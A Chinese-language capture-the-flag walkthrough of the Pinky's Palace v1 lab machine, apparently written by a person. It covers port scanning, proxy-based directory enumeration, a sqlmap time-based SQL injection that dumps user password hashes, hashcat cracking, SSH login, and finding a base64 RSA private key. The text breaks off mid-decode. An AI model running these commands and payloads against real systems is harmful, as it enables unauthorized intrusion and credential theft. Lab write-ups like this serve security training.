红队打靶练习:PINKY‘S PALACE: V1

信息收集

1、arp

┌──(root㉿ru)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.169.36
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.169.63  08:00:27:07:a8:61       PCS Systemtechnik GmbH
192.168.169.131 3c:55:76:dc:ab:f5       CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.169.249 72:d4:e0:75:29:09       (Unknown: locally administered)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.346 seconds (109.12 hosts/sec). 3 responded

---

2、netdiscover

netdiscover -r 192.168.169.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.169.63  08:00:27:07:a8:61      1      60  PCS Systemtechnik GmbH
 192.168.169.131 3c:55:76:dc:ab:f5      2     120  CLOUD NETWORK TECHNOLOGY SIN
 192.168.169.249 72:d4:e0:75:29:09      1      60  Unknown vendor

---

3、nmap

主机存活探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.169.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-15 10:30 CST
Nmap scan report for 192.168.169.63
Host is up (0.00021s latency).
MAC Address: 08:00:27:07:A8:61 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.169.131
Host is up (0.000092s latency).
MAC Address: 3C:55:76:DC:AB:F5 (Cloud Network Technology Singapore PTE.)
Nmap scan report for 192.168.169.249
Host is up (0.045s latency).
MAC Address: 72:D4:E0:75:29:09 (Unknown)
Nmap scan report for 192.168.169.36
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 0.48 seconds

---

端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.169.63 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-15 10:31 CST
Nmap scan report for 192.168.169.63
Host is up (0.0026s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
8080/tcp  open  http-proxy
31337/tcp open  Elite
64666/tcp open  unknown
MAC Address: 08:00:27:07:A8:61 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.26 seconds

---

信息探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -O -A -p 8080,31337,64666 192.168.169.63 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-15 10:32 CST
Nmap scan report for 192.168.169.63
Host is up (0.00027s latency).

PORT      STATE SERVICE    VERSION
8080/tcp  open  http       nginx 1.10.3
|_http-server-header: nginx/1.10.3
|_http-title: 403 Forbidden
31337/tcp open  http-proxy Squid http proxy 3.5.23
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.5.23
64666/tcp open  ssh        OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
|   2048 df:02:12:4f:4c:6d:50:27:6a:84:e9:0e:5b:65:bf:a0 (RSA)
|   256 0a:ad:aa:c7:16:f7:15:07:f0:a8:50:23:17:f3:1c:2e (ECDSA)
|_  256 4a:2d:e5:d8:ee:69:61:55:bb:db:af:29:4e:54:52:2f (ED25519)
MAC Address: 08:00:27:07:A8:61 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.27 ms 192.168.169.63

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.80 seconds


8080   http   nginx
31337  http-proxy 
64666  ssh    OpenSSH

---

漏洞探测

┌──(root㉿ru)-[~/kali]
└─# nmap --script=vuln -p 8080,31337,64666 192.168.169.63 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-15 10:34 CST
Nmap scan report for 192.168.169.63
Host is up (0.00035s latency).

PORT      STATE SERVICE
8080/tcp  open  http-proxy
31337/tcp open  Elite
64666/tcp open  unknown
MAC Address: 08:00:27:07:A8:61 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 73.08 seconds

---

4、nikto

┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.169.63:8080
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.169.63
+ Target Hostname:    192.168.169.63
+ Target Port:        8080
+ Start Time:         2023-12-15 10:45:54 (GMT8)
---------------------------------------------------------------------------
+ Server: nginx/1.10.3
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ All CGI directories 'found', use '-C none' to test none
+ 26662 requests: 0 error(s) and 2 item(s) reported on remote host
+ End Time:           2023-12-15 10:46:38 (GMT8) (44 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

---

WEB

---

我们知道8080端口开的是web服务，并且是nginx服务器！但是我们不能直接访问，直接访问8080端口显示403，但31337端口的服务是http-proxy，所以我们尝试挂31337端口为代理去访问！

---

---

---

这样我们就能正常访问了! 

---

目录探测

1、gobuster

┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir --proxy http://192.168.169.63:31337 -u http://127.0.0.1:8080 -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://127.0.0.1:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] Proxy:                   http://192.168.169.63:31337
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/littlesecrets-main   (Status: 301) [Size: 185] [--> http://127.0.0.1:8080/littlesecrets-main/]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

---

2、dirsearch

┌──(root㉿ru)-[~/kali]
└─# dirsearch --proxy 192.168.169.63:31337 -u "http://127.0.0.1:8080" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 220545

Output File: /root/kali/reports/http_127.0.0.1_8080/_23-12-15_11-31-07.txt

Target: http://127.0.0.1:8080/

[11:31:07] Starting:
[11:34:51] 301 -  185B  - /littlesecrets-main  ->  http://127.0.0.1:8080/littlesecrets-main/
CTRL+C detected: Pausing threads, please wait...

Task Completed

---

---

访问littlesecrets-main目录是一个登录页面。

靶机就开了三个端口，一个8080web页面，一个31337代理端口，一个64666 ssh服务端口。

目录爆破只有一个登录页面，那么这个很有可能有sql注入漏洞，我们应该要进入数据库拿到账号密码。

---

sqlmap

sqlmap挂代理payload

sqlmap --proxy=http://192.168.169.63:31337 --dbms=mysql --data="user=adm&pass=passw&submit=Login" --url http://127.0.0.1:8080/littlesecrets-main/login.php --level=3 --risk=3 --dump users

---

也可以直接去脱库，我们只要users表。

---

1、爆库

┌──(root㉿ru)-[~/kali]
└─# sqlmap --proxy=http://192.168.169.63:31337 --dbms=mysql --data="user=adm&pass=passw&submit=Login" --url http://127.0.0.1:8080/littlesecrets-main/login.php --dbs
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.7.11#stable}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:03:22 /2023-12-15/

[12:03:22] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sqlmap/1.7.11#stable (https://sqlmap.org)' AND (SELECT 9139 FROM (SELECT(SLEEP(5)))Cndh) AND 'Txbq'='Txbq
---
[12:03:22] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[12:03:29] [INFO] confirming MySQL
[12:03:29] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[12:03:39] [INFO] adjusting time delay to 1 second due to good response times
[12:03:39] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.10.3
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[12:03:39] [INFO] fetching database names
[12:03:39] [INFO] fetching number of databases
[12:03:39] [INFO] retrieved: 2
[12:03:41] [INFO] retrieved: information
_schema
[12:04:39] [INFO] retrieved: pinky_sec_db
available databases [2]:
[*] information_schema
[*] pinky_sec_db

[12:05:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/127.0.0.1'

[*] ending @ 12:05:24 /2023-12-15/

---

2、爆表

┌──(root㉿ru)-[~/kali]
└─# sqlmap --proxy=http://192.168.169.63:31337 --dbms=mysql --data="user=adm&pass=passw&submit=Login" --url http://127.0.0.1:8080/littlesecrets-main/login.php -D pinky_sec_db --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.11#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:07:01 /2023-12-15/

[12:07:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sqlmap/1.7.11#stable (https://sqlmap.org)' AND (SELECT 9139 FROM (SELECT(SLEEP(5)))Cndh) AND 'Txbq'='Txbq
---
[12:07:01] [INFO] testing MySQL
[12:07:01] [INFO] confirming MySQL
[12:07:01] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.10.3
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[12:07:01] [INFO] fetching tables for database: 'pinky_sec_db'
[12:07:01] [INFO] fetching number of tables for database 'pinky_sec_db'
[12:07:01] [INFO] resumed: 2
[12:07:01] [INFO] resumed: logs
[12:07:01] [INFO] resumed: users
Database: pinky_sec_db
[2 tables]
+-------+
| logs  |
| users |
+-------+

[12:07:01] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/127.0.0.1'

[*] ending @ 12:07:01 /2023-12-15/

---

3、爆列

┌──(root㉿ru)-[~/kali]
└─# sqlmap --proxy=http://192.168.169.63:31337 --dbms=mysql --data="user=adm&pass=passw&submit=Login" --url http://127.0.0.1:8080/littlesecrets-main/login.php -D pinky_sec_db -T users --columns
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.7.11#stable}
|_ -| . [']     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:07:38 /2023-12-15/

[12:07:38] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sqlmap/1.7.11#stable (https://sqlmap.org)' AND (SELECT 9139 FROM (SELECT(SLEEP(5)))Cndh) AND 'Txbq'='Txbq
---
[12:07:38] [INFO] testing MySQL
[12:07:38] [INFO] confirming MySQL
[12:07:38] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.10.3
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[12:07:38] [INFO] fetching columns for table 'users' in database 'pinky_sec_db'
[12:07:38] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[12:07:38] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y

[12:08:06] [INFO] adjusting time delay to 1 second due to good response times
3
[12:08:06] [INFO] retrieved: uid
[12:08:16] [INFO] retrieved: int(11)
[12:08:41] [INFO] retrieved: user
[12:08:53] [INFO] retrieved: varchar(100)
[12:09:27] [INFO] retrieved: pass
[12:09:40] [INFO] retrieved: varchar(100)
Database: pinky_sec_db
Table: users
[3 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| user   | varchar(100) |
| pass   | varchar(100) |
| uid    | int(11)      |
+--------+--------------+

[12:10:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/127.0.0.1'

[*] ending @ 12:10:13 /2023-12-15/

---

4、爆字段

┌──(root㉿ru)-[~/kali]
└─# sqlmap --proxy=http://192.168.169.63:31337 --dbms=mysql --data="user=adm&pass=passw&submit=Login" --url http://127.0.0.1:8080/littlesecrets-main/login.php -D pinky_sec_db -T users -C user,pass --dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.7.11#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:11:06 /2023-12-15/

[12:11:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sqlmap/1.7.11#stable (https://sqlmap.org)' AND (SELECT 9139 FROM (SELECT(SLEEP(5)))Cndh) AND 'Txbq'='Txbq
---
[12:11:06] [INFO] testing MySQL
[12:11:06] [INFO] confirming MySQL
[12:11:06] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.10.3
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[12:11:06] [INFO] fetching entries of column(s) '`user`,pass' for table 'users' in database 'pinky_sec_db'
[12:11:06] [INFO] fetching number of column(s) '`user`,pass' entries for table 'users' in database 'pinky_sec_db'
[12:11:06] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[12:11:07] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
2
[12:11:17] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[12:11:22] [INFO] adjusting time delay to 1 second due to good response times
pinkymanage
[12:11:53] [INFO] retrieved: d60dffed7cc0d87e1f4a11aa06ca73af
[12:13:43] [INFO] retrieved: pinky
[12:14:01] [INFO] retrieved: f543dbfeaf238729831a321c7a68bee4

+-------------+----------------------------------+
| user        | pass                             |
+-------------+----------------------------------+
| pinkymanage | d60dffed7cc0d87e1f4a11aa06ca73af |
| pinky       | f543dbfeaf238729831a321c7a68bee4 |
+-------------+----------------------------------+

---

得到账号密码，密码是MD5，我们先破解一下

pinkymanage   d60dffed7cc0d87e1f4a11aa06ca73af

pinky         f543dbfeaf238729831a321c7a68bee4

hashcat

┌──(root㉿ru)-[~/kali]
└─# hashcat -m 0 -a 0 d60dffed7cc0d87e1f4a11aa06ca73af /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 4.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 7 5800H with Radeon Graphics, 1422/2909 MB (512 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921530
* Keyspace..: 14344386

d60dffed7cc0d87e1f4a11aa06ca73af:3pinkysaf33pinkysaf3

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: d60dffed7cc0d87e1f4a11aa06ca73af
Time.Started.....: Fri Dec 15 12:21:58 2023 (4 secs)
Time.Estimated...: Fri Dec 15 12:22:02 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3047.4 kH/s (0.05ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 12463104/14344386 (86.88%)
Rejected.........: 0/12463104 (0.00%)
Restore.Point....: 12462592/14344386 (86.88%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 3r7gxjess -> 3pgzHh
Hardware.Mon.#1..: Util: 65%

---

爆破出来一个，另外一个爆破不出来。

pinkymanage   3pinkysaf33pinkysaf3

---

ssh登录

┌──(root㉿ru)-[~/kali]
└─# ssh pinkymanage@192.168.169.63 -p 64666
The authenticity of host '[192.168.169.63]:64666 ([192.168.169.63]:64666)' can't be established.
ED25519 key fingerprint is SHA256:QUuapQBImuyyLZ2XEorKhwl3PUB551ZknLzOB7sXerY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.169.63]:64666' (ED25519) to the list of known hosts.
pinkymanage@192.168.169.63's password:
Linux pinkys-palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb  2 04:00:51 2018 from 127.0.0.1
pinkymanage@pinkys-palace:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 08:00:27:07:a8:61 brd ff:ff:ff:ff:ff:ff
    inet 192.168.169.63/24 brd 192.168.169.255 scope global enp0s3
       valid_lft forever preferred_lft forever
    inet6 240e:45a:8c85:4d7:a00:27ff:fe07:a861/64 scope global mngtmpaddr dynamic
       valid_lft 1935sec preferred_lft 1935sec
    inet6 fe80::a00:27ff:fe07:a861/64 scope link
       valid_lft forever preferred_lft forever
pinkymanage@pinkys-palace:~$

---

提权

系统信息收集

pinkymanage@pinkys-palace:/home$ uname -a
Linux pinkys-palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64 GNU/Linux
pinkymanage@pinkys-palace:/home$

pinkymanage@pinkys-palace:/home$ cd /var/www
pinkymanage@pinkys-palace:/var/www$ ls
html  pinkymanage
pinkymanage@pinkys-palace:/var/www$ cd pinkymanage/
pinkymanage@pinkys-palace:/var/www/pinkymanage$ ls
pinkymanage@pinkys-palace:/var/www/pinkymanage$ ls -al
total 16
drwx------ 3 pinkymanage pinkymanage 4096 Feb  2  2018 .
drwxr-xr-x 4 root        root        4096 Feb  2  2018 ..
-rw------- 1 pinkymanage pinkymanage  117 Feb  2  2018 .bash_history
drwx------ 2 pinkymanage pinkymanage 4096 Feb  2  2018 .ssh
pinkymanage@pinkys-palace:/var/www/pinkymanage$ cd .ssh
pinkymanage@pinkys-palace:/var/www/pinkymanage/.ssh$ ls
known_hosts
pinkymanage@pinkys-palace:/var/www/pinkymanage/.ssh$ cat known_hosts
|1|ddPO6l4PJ+hR883AkBxnqZwLqV0=|Dc3nHxLXil9FeR5kQ5KCU0+Ziug= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDZDIHslZJXVJH6dCHGaJRVy8WULZGgoqkKe8gfp/jibTQiMe8lIE8zFX2S8aXxWo4kSBd6i94zKj4YR2TcFj2o=
pinkymanage@pinkys-palace:/var/www/pinkymanage/.ssh$


pinkymanage@pinkys-palace:/var/www$ ls
html  pinkymanage
pinkymanage@pinkys-palace:/var/www$ cd html
pinkymanage@pinkys-palace:/var/www/html$ ls
index.html  littlesecrets-main
pinkymanage@pinkys-palace:/var/www/html$ ls -al
total 16
drwxr-xr-x 3 root root 4096 Feb  2  2018 .
drwxr-xr-x 4 root root 4096 Feb  2  2018 ..
-rw-r--r-- 1 root root  229 Feb  2  2018 index.html
drwxr-xr-x 3 root root 4096 Feb  2  2018 littlesecrets-main
pinkymanage@pinkys-palace:/var/www/html$ cd littlesecrets-main/
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main$ ls
index.html  login.php  logs.php  ultrasecretadminf1l35
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main$ cd ultrasecretadminf1l35/
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ ls
note.txt
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ cat note.txt
Hmm just in case I get locked out of my server I put this rsa key here.. Nobody will find it heh..

pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$

---

pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ cat note.txt

Hmm just in case I get locked out of my server I put this rsa key here.. Nobody   


嗯，以防我被锁在服务器之外，我把这个rsa密钥放在这里。。没有人                                                                                                                                                        Hmm just in case I get locked out of my server I put this rsa key here.. Nobody will find it heh..

---

pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ ls -al
total 16
drwxr-xr-x 2 root root 4096 Feb  2  2018 .
drwxr-xr-x 3 root root 4096 Feb  2  2018 ..
-rw-r--r-- 1 root root   99 Feb  2  2018 note.txt
-rw-r--r-- 1 root root 2270 Feb  2  2018 .ultrasecret
pinkymanage@pinkys-palace:/var/www/html/littlesecrets-main/ultrasecretadminf1l35$ cat .ultrasecret
LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBMTZmeEwzLyto
L0lMVFpld2t2ZWtoSVExeWswb0xJK3kzTjRBSXRraGV6MTFJaGE4CkhjN0tPeC9MOWcyamQzSDhk
R1BVZktLcjlzZXF0Zzk3WktBOTVTL3NiNHczUXRsMUFCdS9wVktaQmJHR3NIRy8KeUl2R0VQS1Mr
QlNaNHN0TVc3SG54N2NpTXVod2Nad0xxWm1zeVN1bUVDVHVlUXN3TlBibElUbHJxb2xwWUY4eApl
NDdFbDlwSHdld05XY0lybXFyYXhDSDVUQzdVaGpnR2FRd21XM3FIeXJTcXAvaksvY3RiMVpwblB2
K0RDODMzCnUvVHlqbTZ6OFJhRFpHL2dSQklyTUduTmJnNHBaRmh0Z2JHVk9mN2ZlR3ZCRlI4QmlU
KzdWRmZPN3lFdnlCeDkKZ3hyeVN4dTJaMGFPTThRUjZNR2FETWpZVW5COWFUWXV3OEdQNHdJREFR
QUJBb0lCQUE2aUg3U0lhOTRQcDRLeApXMUx0cU9VeEQzRlZ3UGNkSFJidG5YYS80d3k0dzl6M1Mv
WjkxSzBrWURPbkEwT1VvWHZJVmwvS3JmNkYxK2lZCnJsZktvOGlNY3UreXhRRXRQa291bDllQS9r
OHJsNmNiWU5jYjNPbkRmQU9IYWxYQVU4TVpGRkF4OWdrY1NwejYKNkxPdWNOSUp1eS8zUVpOSEZo
TlIrWVJDb0RLbkZuRUlMeFlMNVd6MnFwdFdNWUR1d3RtR3pPOTY4WWJMck9WMQpva1dONmdNaUVp
NXFwckJoNWE4d0JSUVZhQnJMWVdnOFdlWGZXZmtHektveEtQRkt6aEk1ajQvRWt4TERKcXQzCkxB
N0pSeG1Gbjc3L21idmFEVzhXWlgwZk9jUzh1Z3lSQkVOMFZwZG5GNmtsNnRmT1hLR2owZ2QrZ0Fp
dzBUVlIKMkNCN1BzRUNnWUVBOElXM1pzS3RiQ2tSQnRGK1ZUQnE0SzQ2czdTaFc5QVo2K2JwYitk
MU5SVDV4UkpHK0RzegpGM2NnNE4rMzluWWc4bUZ3c0Jobi9zemdWQk5XWm91V3JSTnJERXhIMHl1
NkhPSjd6TFdRYXlVaFFKaUlQeHBjCm4vRWVkNlNyY3lTZnpnbW50T2liNGh5R2pGMC93bnRqTWM3
M3h1QVZOdU84QTZXVytoZ1ZIS0VDZ1lFQTVZaVcKSzJ2YlZOQnFFQkNQK3hyQzVkSE9CSUVXdjg5
QkZJbS9Gcy9lc2g4dUU1TG5qMTFlUCsxRVpoMkZLOTJReDlZdgp5MWJNc0FrZitwdEZVSkxjazFN
MjBlZkFhU3ZPaHI1dWFqbnlxQ29mc1NVZktaYWE3blBRb3plcHFNS1hHTW95Ck1FRWVMT3c1NnNK
aFNwMFVkWHlhejlGUUFtdnpTWFVudW8xdCtnTUNnWUVBdWJ4NDJXa0NwU0M5WGtlT3lGaGcKWUdz
TE45VUlPaTlrcFJBbk9seEIzYUQ2RkY0OTRkbE5aaFIvbGtnTTlzMVlPZlJYSWhWbTBaUUNzOHBQ
RVZkQQpIeDE4ci8yRUJhV2h6a1p6bGF5ci9xR29vUXBwUkZtbUozajZyeWZCb21RbzUrSDYyVEE3
bUl1d3Qxb1hMNmM2Ci9hNjNGcVBhbmcyVkZqZmNjL3IrNnFFQ2dZQStBenJmSEZLemhXTkNWOWN1
ZGpwMXNNdENPRVlYS0QxaStSd2gKWTZPODUrT2c4aTJSZEI1RWt5dkprdXdwdjhDZjNPUW93Wmlu
YnErdkcwZ016c0M5Sk54SXRaNHNTK09PVCtDdwozbHNLeCthc0MyVng3UGlLdDh1RWJVTnZEck9Y
eFBqdVJJbU1oWDNZU1EvVUFzQkdSWlhsMDUwVUttb2VUSUtoClNoaU9WUUtCZ1FEc1M0MWltQ3hX
Mm1lNTQxdnR3QWFJcFE1bG81T1Z6RDJBOXRlRVBzVTZGMmg2WDdwV1I2SVgKQTlycExXbWJmeEdn
SjBNVmh4Q2pwZVlnU0M4VXNkTXpOYTJBcGN3T1dRZWtORTRlTHRPN1p2MlNWRHI2Y0lyYwpIY2NF
UCtNR00yZVVmQlBua2FQa2JDUHI3dG5xUGY4ZUpxaVFVa1dWaDJDbll6ZUFIcjVPbUE9PQotLS0t
LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=

---

得到密钥 把密钥进行base64解码


┌──(root㉿ru)-[~]
└─# echo "LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBMTZmeEwzLyto
L0lMVFpld2t2ZWtoSVExeWswb0xJK3kzTjRBSXRraGV6MTFJaGE4CkhjN0tPeC9MOWcyamQzSDhk
R1BVZktLcjlzZXF0Zzk3WktBOTVTL3NiNHczUXRsMUFCdS9wVktaQmJHR3NIRy8KeUl2R0VQS1Mr
QlNaNHN0TVc3SG54N2NpTXVod2Nad0xxWm1zeVN1bUVDVHVlUXN3TlBibElUbHJxb2xwWUY4eApl
NDdFbDlwSHdld05XY0lybXFyYXhDSDVUQzdVaGpnR2FRd21XM3FIeXJTcXAvaksvY3RiMVpwblB2
K0RDODMzCnUvVHlqbTZ6OFJhRFpHL2dSQklyTUduTmJnNHBaRmh0Z2JHVk9mN2ZlR3ZCRlI4QmlU
KzdWRmZPN3lFdnlCeDkKZ3hyeVN4dTJaMGFPTThRUjZNR2FETWpZVW5COWFUWXV3OEdQNHdJREFR
